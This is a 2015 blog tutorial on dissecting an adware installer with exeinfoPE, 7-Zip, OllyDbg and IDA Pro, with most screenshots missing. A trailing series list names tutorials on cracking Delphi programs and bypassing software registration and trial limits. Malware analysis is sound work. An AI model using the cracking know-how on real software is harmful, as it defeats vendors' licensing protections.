By ro0ted | March 17, 2015 - 18:00 | Posted in /b/ | 12 Comments
#ro0ted #OpNewblood What the blackhats don’t want you to know: Dissecting Adware

More adware.

 

The target:

Untitled

 

Load it in exeinfoPE:

Untitled

Nullsoft is easy. Look it’s going to say it’s crypted:

Untitled

For kicks let’s check its Crypto I’m guessing CRC32:

Untitled

UntitledUntitled

We don’t need to do anything complicated. Just open it in 7zip:

Untitled

And we see all the resources in the folder above it:

Untitled

You can load the .dll’s one by one if you wanted in Olly or IDA Pro.

In Ollydbg go to Plugins,
Select load dll:
Untitled

Untitled

IDA Pro:

Untitled

I found this interesting file in the directory list:

Untitled

Oops.
Let’s reverse the stub….
Just open it in Notepad++:

Untitled

Untitled

You can read the Nullsoft stub source here:

https://cyberguerrilla.org/paste/?c5a5b4df6f76e9ef#FGYLE2fQsC2wyoFOe1aMOR05RvJbkunArSUkwzNzqZ8=

And that my friends is how you rip apart Adware….in a jiffy. – https://twitter.com/ro0ted/

ro0ted

 


 

 

Check out my other tuts in my series…. “What the Blackhats don’t want you to know”

 

(In order)

Why am I teaching Reverse Engineering to inexperienced new Anons in OpNewblood?

Whitehat Lab

ASM Programming

Introduction Part 1 Ollydbg 

Introduction Part 2 Using Ollydbg and Tracing Botnets

Analyzing Botnets

 Introduction Part 3 Ollydbg: Cheating a Crackme

Introduction Part 4 Ollydbg: Your first Patch

Encryption 101

Cuckoo Sandbox: Automated Malware Analysis also known as Malwr.com

Introduction to Honeydrive: A Brief Walk Through

Installing Kippo the SSH Honeypot on a VPS Part 1: How to set it up

Resource Hacker

Dll Injection the Easy Way

Visual Basic Binaries Walk Through Part 1

Ollydbg on Steroids

Creating Patchers Part 1

Have you supported the gas mask campaign over the years?

Crack to win a gas mask gift pack

How to edit a register me crack me Pre Part 1

Unwinding Delphi Binaries Walk Through if not Preview

Cracking Delphi Part 2

Reversing Timed Trials: Ollydbg Tricks Part 3

Analyzing Adware

Preview Against Debugging

Bypassing Registering 101

Bypassing Part 2

Android/iOS Reversing

Introducing IDA Pro: Static Analyzing

Hacker’s Disassembler

Ripping Apart Adware +

(Visited 468 times, 1 visits today)


  • You can follow any responses to this entry through the RSS 2.0 feed.
  • Both comments and pings are currently closed.